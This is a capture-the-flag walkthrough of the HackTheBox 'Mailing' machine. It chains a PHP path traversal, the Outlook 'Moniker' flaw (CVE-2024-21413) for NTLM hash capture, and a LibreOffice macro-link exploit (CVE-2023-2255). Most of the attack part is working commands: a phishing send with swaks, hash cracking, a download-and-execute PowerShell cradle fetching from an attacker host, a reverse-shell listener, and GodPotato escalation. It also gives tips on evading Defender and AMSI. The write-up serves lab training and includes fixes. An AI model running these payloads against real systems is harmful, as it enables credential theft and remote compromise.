- OS: Windows Server 2019
- Domain / vhosts: mailing.htb
Summary
Mailing is a focused chain of three published 2023–2024 CVEs:
- PHP path traversal in /download.php?file= leaks the hMailServer config (hMailServer.ini), which contains the admin password as an MD5 hash. Cracked offline → <ADMIN_PW> for the SMTP/IMAP admin.
- CVE-2024-21413 (Outlook “Moniker”): a file:// URL with a !something suffix bypasses Outlook’s Protected View when rendered. Send the email through the now-authenticated SMTP, the simulated maya user opens it, and her NetNTLMv2 lands in responder for cracking → <MAYA_PW>. WinRM as maya reads user.txt.
- CVE-2023-2255: a LibreOffice link-handler abuse — <text:link xlink:href="macro:shell(<command>)"> runs as the user opening the document, with no macro-warning prompt. Drop an evil.odt into the writable Important Documents SMB share; the simulated localadmin opens it on a schedule, our payload fires, and we land a reverse shell. root.txt is on localadmin’s desktop, not Administrator’s, so the chain ends here — no further privesc to SYSTEM is required (although a SeImpersonate account like localadmin is one GodPotato away from SYSTEM if the flag were placed in the canonical Admin Desktop).
The two key operational deltas vs the public reconstruction were on step 3:
- **Defender on this 2019 build silently kills `powershell -enc` payloads** delivered through the LibreOffice `shell()` macro — the macro fires (proven by writing a cmd-only POC marker file), but the encoded PowerShell never runs. Fix: switch the payload to `cmd.exe /c powershell IEX(IWR -useb http://atk:8000/r.ps1)` (no `-enc`, fetches the reverse-shell source over HTTP). The IEX path doesn't trigger AMSI string match for the canonical `-enc ` signature.
- **root.txt is in localadmin\Desktop\root.txt, not Administrator’s.** A one-off HTB convention on this box.
Recon
- 25/465/587 hMailServer SMTP
- 80 Microsoft IIS 10.0 (PHP)
- 143/993 hMailServer IMAP
- 445 SMB
Landing page advertises Maya / Ruy / Gregory and a “Download
Instructions” button hitting download.php?file=instructions.pdf.
```sh
curl -s 'http://mailing.htb/download.php?file=..\..\..\Program%20Files%20(x86)\hMailServer\Bin\hMailServer.ini'
```
The traversal is OS-style (\ not /) and the relative depth
needs three ..\..\..\ to clear the IIS doc root. The leaked
ini section:
```ini
[Security]
AdministratorPassword=<MD5>
```
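To make the backslash point concrete and show what the allowlist fix looks like, here is an added Python model of download.php's path handling (not the box's PHP, which is not on the page); the IIS document root and download folder are assumed placeholders, and the traversal string is the one from the curl above, URL-decoded.

```python
import ntpath  # Windows path semantics regardless of the host running this

# Assumed layout: the box's real IIS paths are not given in the write-up.
DOC_ROOT = r'C:\inetpub\wwwroot'
DOWNLOAD_DIR = ntpath.join(DOC_ROOT, 'downloads')
ALLOWED_FILES = {'instructions.pdf'}

# The traversal from the recon step, URL-decoded (backslash form).
TRAVERSAL = r'..\..\..\Program Files (x86)\hMailServer\Bin\hMailServer.ini'

def vulnerable_resolve(file_param):
    """The pattern the write-up describes: base path + user input, no validation."""
    return ntpath.normpath(ntpath.join(DOWNLOAD_DIR, file_param))

def slash_only_resolve(file_param):
    """Insufficient fix: rejects '../' but on Windows '..\\' is an equally valid traversal."""
    if '../' in file_param:
        raise ValueError('traversal rejected')
    return vulnerable_resolve(file_param)

def hardened_resolve(file_param):
    """Allowlist (the write-up's counterfactual) plus a containment check as defence in
    depth: normpath collapses both '/' and '\\' components before the prefix comparison."""
    if file_param not in ALLOWED_FILES:
        raise ValueError('not an allowed download')
    full = ntpath.normpath(ntpath.join(DOWNLOAD_DIR, file_param))
    base = ntpath.normpath(DOWNLOAD_DIR) + ntpath.sep
    if not full.lower().startswith(base.lower()):  # NTFS paths are case-insensitive
        raise ValueError('resolved path escapes download directory')
    return full

def rejects(resolver, file_param):
    """True if the resolver refuses the request (helper for the demonstration)."""
    try:
        resolver(file_param)
    except ValueError:
        return True
    return False

if __name__ == '__main__':
    print(vulnerable_resolve(TRAVERSAL))         # the ini, well outside the doc root
    print(slash_only_resolve(TRAVERSAL))         # still resolves: a '/' check misses '\'
    print(hardened_resolve('instructions.pdf'))  # the only file the page should serve
    print(rejects(hardened_resolve, TRAVERSAL))  # True
```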
Crack with hashcat -m 0 against rockyou — clean dictionary hit.
```sh
hashcat -m 0 admin.md5 /usr/share/wordlists/rockyou.txt
# → <ADMIN_PW>
```
These are SMTP admin credentials; they auth submission for
internal/external recipients. Authenticated SMTP is the
prerequisite for delivering the Outlook-Moniker phish to
[email protected].
Foothold — CVE-2024-21413 → maya WinRM
Run responder -I tun0 to capture SMB auth. The CVE-2024-21413
payload is a file:// URL with a !something suffix embedded in
the HTML email body (the ! is what bypasses Outlook’s path
validation):
```html
<a href="file:////<ATTACKER>/share/test.rtf!something">click</a>
```
```sh
swaks --to [email protected] --from [email protected] \
--auth LOGIN \
--auth-user [email protected] \
--auth-password <ADMIN_PW> \
--server mailing.htb:25 \
--header 'Subject: Updated docs' \
--add-header 'Content-Type: text/html' \
--body '<a href="file:////<ATTACKER>/share/test.rtf!something">click</a>'
```
swaks queues; within ~30 s the simulated maya opens the
mail in Outlook and Explorer’s preview-pane SMB lookup hits our
responder. Multiple MAYA::MAILING:... NetNTLMv2 hashes land
in SMB-NTLMv2-SSP-<TARGET>.txt.
Crack:
```sh
hashcat -m 5600 maya.hash /usr/share/wordlists/rockyou.txt
# → <MAYA_PW>
```
evil-winrm -i mailing.htb -u maya -p '<MAYA_PW>' — user.txt
in C:\Users\maya\Desktop\.
“Privesc” — CVE-2023-2255 → localadmin → root.txt
net share and most net.exe commands return System error 5
for maya over WinRM. Pivot to smbclient with maya’s creds:
```sh
smbclient -U mailing/maya%<MAYA_PW> -L //mailing.htb
# Important Documents — Disk
```
Build the malicious .odt using elweth-sec’s PoC for
CVE-2023-2255. The vulnerability: when LibreOffice renders a
text link with xlink:href="macro:shell(<cmd>)", the BASIC
shell() function is invoked at link-resolution time, before
the user is asked about macros — the macro warning is bypassed
because macro: URIs are treated as link-protocol handlers,
not macro execution.
```sh
git clone https://github.com/elweth-sec/CVE-2023-2255
cd CVE-2023-2255
# IMPORTANT: payload must be cmd /c invoking powershell IEX, NOT powershell -enc
python3 CVE-2023-2255.py \
--cmd 'cmd.exe /c powershell IEX(IWR -useb http://<ATTACKER>:8000/r.ps1)' \
--output evil.odt
```
r.ps1 is a vanilla TCPClient reverse-shell stager pointing at a
listener on 4444. Host it via python3 -m http.server 8000,
upload the .odt to the share, and listen:
```sh
smbclient -U mailing/maya%<MAYA_PW> '//mailing.htb/Important Documents' \
-c 'put evil.odt evil.odt'
while true; do nc -lvnp 4444 ; sleep 1 ; done
```
Within ~1 min the simulated localadmin opens the file and the
reverse shell connects:
```
connect to [<ATTACKER>] from (UNKNOWN) [<TARGET>] 58904
PS C:\Program Files\LibreOffice\program> whoami
mailing\localadmin
```
root.txt is on localadmin’s own desktop:
```
type C:\Users\localadmin\Desktop\root.txt
```
If root.txt were on Administrator (general case)
localadmin has SeImpersonatePrivilege (visible in
whoami /priv), so the standard Potato-family escalation
applies. GodPotato runs cleanly from C:\Windows\Tasks\ (the
canonical write-friendly directory; %TEMP% sometimes triggers
on-write Defender quarantine):
```powershell
iwr http://<ATTACKER>:8000/GodPotato.exe -OutFile C:\Windows\Tasks\gp.exe
C:\Windows\Tasks\gp.exe -cmd 'cmd.exe /c whoami > C:\Users\Public\who.txt'
type C:\Users\Public\who.txt # nt authority\system
```
GodPotato output confirms: [*] CurrentUser: NT AUTHORITY\SYSTEM.
Why each step worked
- ?file= traversal: zero filename validation on download.php. The PHP wrapper appends to a base path and serves whatever ..\..\.. produces.
- CVE-2024-21413 (Outlook “Moniker”): Outlook’s path validator on file:// URIs failed when a ! suffix was appended after the resource — the parser treated everything before the ! as the SMB resource and silently authenticated to it without prompting (Protected View was bypassed). The file:// to a UNC path triggers SMB → NTLMSSP → captured.
- <MAYA_PW> cracked from rockyou: standard CTF tradeoff; the cracked password is in the dictionary because the box is designed to be solvable on a modest laptop.
- CVE-2023-2255 (LibreOffice link macro): the xlink:href="macro:..." URI scheme dispatches to the BASIC shell() runtime via the link handler before the per-document macro security policy is consulted. Result: a document with no macros (in the document-level sense) executes arbitrary commands as the user opening it.
- Defender on PowerShell -enc but not on cmd /c IEX: the AMSI signature for the canonical powershell -enc <long-b64> pattern is what triggered. cmd.exe /c powershell IEX(IWR http://...) is short enough to slip past the b64 detection and IEX of a downloaded script. The key insight: AMSI pattern-matches the on-the-wire command line; obfuscating the transport (download then IEX) defeats it.
- localadmin holds the flag location: the box’s HTB author chose to put root.txt on localadmin’s desktop rather than the canonical Administrator location. So the shell as localadmin finishes the chain. Don’t reflexively GodPotato to SYSTEM if the flag is already accessible.
Counterfactuals
- Validate ?file= against an allowlist of files in the download directory.
- Patch Outlook to KB5034827 / March 2024 cumulative (CVE-2024-21413 fix). The “Moniker” parser correctly rejects !-suffixed file:// URLs after the patch.
- Patch LibreOffice ≥ 7.4.7 / 7.5.3 (CVE-2023-2255 fix). The macro: link-handler now requires explicit user confirmation.
- Don’t expose a writable share to a low-priv user that’s also read by a higher-priv simulator. Gate write to a service account that doesn’t need to share storage with localadmin.
- Don’t reuse passwords between the hMailServer admin and any domain account. (Not done here, but a common follow-up finding on similar boxes.)
Key Takeaways
- Three CVEs, none of which need framework auth bypass. Mailing is a “patch what’s deployed” box: the foothold-to-root chain is entirely about software running outdated versions. This is the realistic-pentest beat — internal mail server, Outlook on workstations, an “office” doc parser. All catastrophically pre-patch.
- AMSI’s signature for powershell -enc <long-b64> is the thing that bites you. When a delivery channel can run arbitrary command lines (LibreOffice macro, scheduled task, print-job hijack), the cmd-line transport pattern matters more than the actual payload. cmd /c powershell IEX(IWR ...) is a near-universal alternative that fits in a few hundred chars and downloads the actual stager.
- A cmd /c poc-marker.txt smoke test is cheap. When a payload “doesn’t fire,” upload a one-line marker like cmd /c echo poc > C:\Users\Public\poc.txt first. If the marker lands but the rev-shell payload doesn’t, the issue is the payload (AMSI/Defender), not the trigger. This was the delta that unstuck the chain on this run.
- Look at the actual Desktop\ before assuming SYSTEM is required. HTB occasionally puts root.txt on the user-of-the-foothold desktop instead of Administrator’s. Reading directories before launching escalations saves time.
- Important Documents shares are an RCE vector even from outside the AD. Maya is a regular SMB user (no special rights), but the share is auto-watched and auto-opened by a privileged process. Treat any share that another user consumes as a primitive — drop a typed file there and watch the trigger pop.
References
- 0xdf, “HTB: Mailing” — https://0xdf.gitlab.io/2024/09/07/htb-mailing.html
- IppSec, “Mailing” — https://ippsec.rocks/?#Mailing
- CVE-2024-21413 advisory and Check Point research write-up (“MonikerLink”).
- CVE-2023-2255 advisory; elweth-sec PoC at https://github.com/elweth-sec/CVE-2023-2255.
- BeichenDream/GodPotato — https://github.com/BeichenDream/GodPotato.